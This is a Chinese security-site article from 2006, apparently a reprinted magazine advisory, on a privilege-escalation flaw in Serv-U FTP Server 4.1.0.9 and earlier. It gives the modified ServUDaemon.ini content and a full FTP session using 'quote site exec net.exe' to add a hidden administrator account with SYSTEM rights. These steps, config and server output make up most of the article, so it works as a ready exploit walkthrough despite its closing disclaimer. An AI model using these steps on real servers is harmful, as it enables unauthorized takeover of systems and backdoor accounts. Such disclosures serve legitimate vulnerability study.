通行证│用户名: 密码: 验证码: 验证码,看不清楚?请点击刷新验证码 电信网通铁通移动   在线
文章搜索:
热门搜索:红客 黑鹰 红客技术 安全动画 红客培训
首页 文章 软件 动画 资源 励志 论坛 邮箱 会员 军事 科技 博客 爱心红客 最近更新 800g资源
 业内新闻 漏洞公告 病毒公告 电脑知识 网络知识 菜鸟入门 攻防教程 黑客攻防 安全编程 工具使用 综合安全 个人安全 安全相关 Q Q安全 原创精华 红客人物 站内事件
您现在的位置: 爱国者安全网 >> 文章类 >> 红客教程 >> 网络攻防 >> 文章正文
Serv-U FTP Server远程/本地提升权限缺陷
责任编辑:水土不服   更新日期:2006-8-24
 

  本地提升权限:是

  远程提升权限:是

  使用前提条件:对Serv-U配置文件有修改权限

  声明:这只是一个提升权限的思路和方法。

  一、受影响的软件

  Serv-U FTP Server 4.1.0.9 (以及以前所有版本)

  二、受影响系统

  Microsoft Windows Server 2003 所有版本

  Microsoft Windows XP 所有版本

  Microsoft Windows 2000 所有版本

  Microsoft Windows NT 所有版本

  三、综述

  Serv-U FTP Server为RhinoSoft出品的一款Ftp Sserver软件,目前在全世界广为使用。经我研究发现,Serv-U FTP Server的配置文件存贮于Serv-U FTP Server文件目录下的ServUDaemon.ini文件中。如果本地受限用户或者远程拥有普通权限的攻击者能接触到该文件并精心构造ServUDaemon.ini文件中的内容就能利用Ftp进程在系统上以SYSTEM权限执行任意命令。

  四、缺陷分析:

  Serv-U FTP Serve在设置用户以后会把配置信息存储与ServUDaemon.ini文件中。包括用户的权限信息和可访问目录信息。本地受限用户或者是远程攻击者只要能够读写Serv-U FTP Serve的文件目录,就可以通过修改目录中的ServUDaemon.ini文件实现以Ftp进程在远程、本地系统上以FTP系统管理员权限来执行任意命令。并且不受系统版本的影响。(用户信息选择“存储与系统注册表中”不受此缺陷影响)

五、测试方法:

  1、本地测试

  假设本地受限用户可以浏览Serv-U FTP Serve的文件目录。找到ServUDaemon.ini文件。用记事本打开原文件大致内容为:

  [GLOBAL]

  Version=4.1.0.0 // Serv-U Ftp Server 版本号

  ProcessID=584

  RegistrationKey=UEyz459waBR4lVRkIkh4dYw9f8v4J/
AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo+wAGnUBuycB

  [DOMAINS]

  Domain1=127.0.0.1||21|127.0.0.1|1|0 //主机IP以及域名,端口情况

  [Domain1]

  User1=zihuan|1|0

  [USER=zihuan|1]

  Password=rfE8DFBE3F7EC27FB043D4305A04E6D2C6

  HomeDir=c:\ // 可以浏览的目录

  TimeOut=600

  Access1=C:\|RWAMLCDP

  如果把ServUDaemon.in文件修改为:

  [GLOBAL]

  Version=4.1.0.0

  ProcessID=584

  RegistrationKey=UEyz459waBR4lVRkIkh4dYw9f8v4J/
AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo+wAGnUBuycB

  [DOMAINS]

  Domain1=127.0.0.1||21|127.0.0.1|1|0

  [Domain1]

  User1=zihuan|1|0

  [USER=zihuan|1]

  Password=rfE8DFBE3F7EC27FB043D4305A04E6D2C6

  HomeDir=c:\

  TimeOut=600

  Maintenance=System //权限类型

  Access1=C:\|RWAMELCDP

以上内容比原内容多了一句“Maintenance=System”修改完成后保存。然后在用Ftp登陆到Serv-U FTP Server以后执行如下命令:

  ftp>open ip

  Connected to ip.

  220 Serv-U FTP Server v4.1.0.0 for WinSock ready...

  User (ip:(none)): id //输入构造的用户

  331 User name okay, please send complete E-mail address as password.

  Password:password //密码

  230 User logged in, proceed.

  ftp> cd winnt //进入win2k的winnt目录,如果是winxp或者是windows server 2003就应该为windows目录。

  250 Directory changed to /WINNT

  ftp>cd system32 //进入system32目录

  250 Directory changed to /WINNT/system32

  ftp>quote site exec net.exe user zihuan ziHUAN /add //利用系统的net.exe文件加用户。

  200 EXEC command successful (TID=33).

  ftp>quote site exec net.exe localhost administrators zihuan /add //提升为超级用户

  这样就在本地系统上加了一个为zihuan密码为:ziHUAN的超级用户。也可以直接用quote site exec net.exe localhost administrators user /add命令把当前用户提升到超级用户组中去。当然也可以在系统上执行任何命令。

  声明:

  本本仅用来描述可能存在的安全问题,作者本人和黑客X档案杂志社不为此安全公告提供任何保证或承诺。由于传播、利用此文章提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。作者拥有对此安全公告的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者本人允许,不得任意修改或者增减此文章公告内容。

  • 上一篇文章:
  • 下一篇文章:
  • 最近更新
    固顶文章 爱国者安全网2007年度优秀版主评选
    普通文章 瑞星公司01月11日发布 每日计算机病毒及木马播报
    普通文章 破解博彩神助(专注彩票) V2.8.01
    推荐文章 推荐:跨站脚本执行漏洞代码的六点思路
    普通文章 Windows系统下的远程堆栈溢出 实战篇
    普通文章 Windows系统下的远程堆栈溢出 原理篇
    普通文章 MsSQLServer是如何加密口令的
    普通文章 浅谈国内的渗透评估过程
    普通文章 Dvbbs8.1 0DAY(通杀Access和mssql版本)
    普通文章 微软:我们的代码比赛门铁克更安全
    热门文章
    普通文章提醒:“求职信”病毒1月6日发作
    普通文章两条“蠕虫”蠢蠢欲动
    普通文章5“网银大盗”狂盗储户14万 武汉男子被判10年
    普通文章“木马事件”终告结束 英语学习网重获新生
    普通文章搜索引擎不再喜欢新米,并非只是CN米
    普通文章蠕虫"威金"新变种 "小熊猫"屠宰多个计算机系统
    普通文章元旦上网谨防“Real蛀虫” 通过视频文件传播
    普通文章入侵工具Knark的分析及防范
    普通文章认清本质 计算机病毒防治常遇问题
    普通文章饶过现代Anti-Rookit工具的内核模块扫描(ZT)
    精彩专题